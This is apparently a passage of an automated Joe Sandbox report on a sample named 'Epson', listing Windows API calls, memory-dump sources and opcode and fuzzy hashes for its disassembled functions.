                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 715eeb154fa176a8ae073a993cf9905523abde1fffe47d414643aa6598cfdc3b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8819031508242AFC714DF24C885E2ABBE6FF84318F18859DF5594B2A2DB31ED45EB92
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(00000035), ref: 00FB00A9
                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00FB0150
                                                                                                                                                                                                                                      • VariantCopy.OLEAUT32(00FB0354,00000000), ref: 00FB0179
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(00FB0354), ref: 00FB019D
                                                                                                                                                                                                                                      • VariantCopy.OLEAUT32(00FB0354,00000000), ref: 00FB01A1
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00FB01AB
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3859894641-0
                                                                                                                                                                                                                                      • Opcode ID: eae324b9077b059e648f1d41d4a9a212061546b2993bae451e1a8ee44940e075
                                                                                                                                                                                                                                      • Instruction ID: fffefb4c1e2d64fc530ed492c6c9cf009da39c56c55376f7bb960986680c2b9b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eae324b9077b059e648f1d41d4a9a212061546b2993bae451e1a8ee44940e075
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF51E835500310EACF24AB66DC89BAAB3A5EF45310B148457F906DF296DE748C44FF52
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F541EA: _wcslen.LIBCMT ref: 00F541EF
                                                                                                                                                                                                                                        • Part of subcall function 00F58577: _wcslen.LIBCMT ref: 00F5858A
                                                                                                                                                                                                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00FC9F2A
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FC9F4B
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FC9F72
                                                                                                                                                                                                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00FC9FCA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                                                                                      • String ID: X
                                                                                                                                                                                                                                      • API String ID: 83654149-3081909835
                                                                                                                                                                                                                                      • Opcode ID: ba650eb7e68368d7a371c83f00d1592714e1d94fd79aa035689101ef2da8e681
                                                                                                                                                                                                                                      • Instruction ID: b4bee811ad0de12c76f605a3f805231905fdda66025ea1a2aac6d568b81c84ee
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba650eb7e68368d7a371c83f00d1592714e1d94fd79aa035689101ef2da8e681
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3DE1B3319083019FC724DF24C986F6AB7E0BF84354F04856DF98A9B2A2DB75DD05DB92
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FC6F21
                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00FC707E
                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00FF0CC4,00000000,00000001,00FF0B34,?), ref: 00FC7095
                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00FC7319
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                      • String ID: .lnk
                                                                                                                                                                                                                                      • API String ID: 886957087-24824748
                                                                                                                                                                                                                                      • Opcode ID: 8a41990d3060cbf4f7ab7cb668a4efa8c6d8120a7a0cb831ad00630e0a9944d8
                                                                                                                                                                                                                                      • Instruction ID: 6caf5eab8b5415366a81dd1d0e913f6fb8be24955319c82154ce9a900062613e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a41990d3060cbf4f7ab7cb668a4efa8c6d8120a7a0cb831ad00630e0a9944d8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6ED14871608301AFC304EF24C881E6BB7E8FF98744F40495DF6959B262DB75E90ADB92
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F5249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F524B0
                                                                                                                                                                                                                                      • BeginPaint.USER32(?,?,?), ref: 00F51B35
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00F51B99
                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00F51BB6
                                                                                                                                                                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F51BC7
                                                                                                                                                                                                                                      • EndPaint.USER32(?,?,?,?,?), ref: 00F51C15
                                                                                                                                                                                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00F93287
                                                                                                                                                                                                                                        • Part of subcall function 00F51C2D: BeginPath.GDI32(00000000), ref: 00F51C4B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3050599898-0
                                                                                                                                                                                                                                      • Opcode ID: 790797da3214452b5293d633a4349c9cd785aca6c79c89ca6e22141a6fe31baf
                                                                                                                                                                                                                                      • Instruction ID: cbbbe94660444eb0052b1e24c493bfbb67ddee84d5751c3650ad18dfd0b38f56
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 790797da3214452b5293d633a4349c9cd785aca6c79c89ca6e22141a6fe31baf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE41D431604304AFDB20DF14DCC4FB67BA8FB45335F100659FA948B1A1C735A948EB61
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00FC11B3
                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00FC11EE
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00FC120A
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00FC1283
                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00FC129A
                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00FC12C8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3368777196-0
                                                                                                                                                                                                                                      • Opcode ID: 2f35c2774757715c117fd1334e95a10c5184bf85c134b43df57dec4aa3357cc6
                                                                                                                                                                                                                                      • Instruction ID: 76b1a5306679128c7fc29e95473084b1aebadb85b2aa7f9f61522d2c48a5d676
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f35c2774757715c117fd1334e95a10c5184bf85c134b43df57dec4aa3357cc6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75416A71900205EFDF04DF54DCC5AAAB7B8FF05310B1480A9ED049E296DB74DE61EBA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00FAFBEF,00000000,?,?,00000000,?,00F939E2,00000004,00000000,00000000), ref: 00FE8CA7
                                                                                                                                                                                                                                      • EnableWindow.USER32(?,00000000), ref: 00FE8CCD
                                                                                                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00FE8D2C
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000004), ref: 00FE8D40
                                                                                                                                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 00FE8D66
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00FE8D8A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 642888154-0
                                                                                                                                                                                                                                      • Opcode ID: e8928131dbd276ed58e07a29737f50ce76fc34db3d4bfe32bcc3d2439b2285fc
                                                                                                                                                                                                                                      • Instruction ID: e1f19acc811509969832bad316891332a07bee57d8775913d24e0d86cf2645c2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8928131dbd276ed58e07a29737f50ce76fc34db3d4bfe32bcc3d2439b2285fc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A41CA30B01284AFDB35EF69C885BA17BF1FB46394F2440A5E54D5F1A2CB355847EB50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 00FD2D45
                                                                                                                                                                                                                                        • Part of subcall function 00FCEF33: GetWindowRect.USER32(?,?), ref: 00FCEF4B
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00FD2D6F
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00FD2D76
                                                                                                                                                                                                                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00FD2DB2
                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00FD2DDE
                                                                                                                                                                                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00FD2E3C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2387181109-0
                                                                                                                                                                                                                                      • Opcode ID: 611f2c53b001b8056f1317d8f684d4901f1a023df13d76eb9ae9e4e0d5d02145
                                                                                                                                                                                                                                      • Instruction ID: fe625d1b28b9f5e639678b510163e251f0f122700c6ba44717138e768b449108
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 611f2c53b001b8056f1317d8f684d4901f1a023df13d76eb9ae9e4e0d5d02145
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC31CF72505315ABC720DF18CC45B9AB7AAFF98354F04091AF8959B291DA30E909DBD2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 00FB55F9
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00FB5616
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00FB564E
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FB566C
                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00FB5674
                                                                                                                                                                                                                                      • _wcsstr.LIBVCRUNTIME ref: 00FB567E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 72514467-0
                                                                                                                                                                                                                                      • Opcode ID: 25616a7c14df66861a087a1f6d4f78c902c5da969db2feda810ce86c32b8fdd5
                                                                                                                                                                                                                                      • Instruction ID: 0e317cc63e4791ab4332c8cdacc6d031d35c8df3c66a565e5febccf640428421
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 25616a7c14df66861a087a1f6d4f78c902c5da969db2feda810ce86c32b8fdd5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B212932604504BBEB155B26DC49FBB7BA9DF45B20F14803AF809CE091EFB9DC41BA61
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F55851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F555D1,?,?,00F94B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00F55871
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FC62C0
                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00FC63DA
                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00FF0CC4,00000000,00000001,00FF0B34,?), ref: 00FC63F3
                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00FC6411
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                      • String ID: .lnk
                                                                                                                                                                                                                                      • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                      • Opcode ID: 62df3de592d176b0f1612f1d7d456db0ec487d73061dd798f751386f26f84426
                                                                                                                                                                                                                                      • Instruction ID: 0a593f7a9f97fe1b20c693fa68800c8a686a75e7853d09c6778c92bee23d7adb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62df3de592d176b0f1612f1d7d456db0ec487d73061dd798f751386f26f84426
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3DD14171A082029FC714DF24C981E2ABBF5AF89724F14885DF985DB361CB35EC49DB92
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FE8740
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00FE8765
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00FE877D
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 00FE87A6
                                                                                                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00FCC1F2,00000000), ref: 00FE87C6
                                                                                                                                                                                                                                        • Part of subcall function 00F5249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F524B0
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 00FE87B1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2294984445-0
                                                                                                                                                                                                                                      • Opcode ID: b9f529e599ea88f7ad6aebe6bad4ebd85176dd8847bf397bbf522ce546cddd26
                                                                                                                                                                                                                                      • Instruction ID: c0657d9b4ae491889b73f72203b6800971e802756253c5ad1c55a9bf08bf9547
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9f529e599ea88f7ad6aebe6bad4ebd85176dd8847bf397bbf522ce546cddd26
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7521C4716102859FCB24AF79CC48A6A3BA5FB453B5F344729F96BC65E0DF308842EB10
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,00F736E9,00F73355), ref: 00F73700
                                                                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F7370E
                                                                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F73727
                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00F736E9,00F73355), ref: 00F73779
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                                                                                      • Opcode ID: 48ad7c531cac468bb68031967fa7a103bf622e84bb6c7bf04723740f764b46e6
                                                                                                                                                                                                                                      • Instruction ID: 8b88bc910e6244fc95ac0af8de49d8db0788e2d009fed3c9958c57ef529473d7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48ad7c531cac468bb68031967fa7a103bf622e84bb6c7bf04723740f764b46e6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F40128B790E3217EA63966B4ACCA6673695EB057B1320822BF518440E0EF1E4D037342
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,00F74D53,00000000,?,?,00F768E2,?,?,00000000), ref: 00F830EB
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F8311E
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F83146
                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00000000), ref: 00F83153
                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00000000), ref: 00F8315F
                                                                                                                                                                                                                                      • _abort.LIBCMT ref: 00F83165
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3160817290-0
                                                                                                                                                                                                                                      • Opcode ID: 6e04c24f7d53463663e060551c418ad8963640865dd4b583ae66639dd5f87ca5
                                                                                                                                                                                                                                      • Instruction ID: d3c0af09a7329c3352e4f367acb8ce4371cd5dafa80e273ba159f5047e03f1d8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e04c24f7d53463663e060551c418ad8963640865dd4b583ae66639dd5f87ca5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5F0A936E0490166C6113735AC4EADF36559FC1F71B250415FA24961F1EF2D89027361
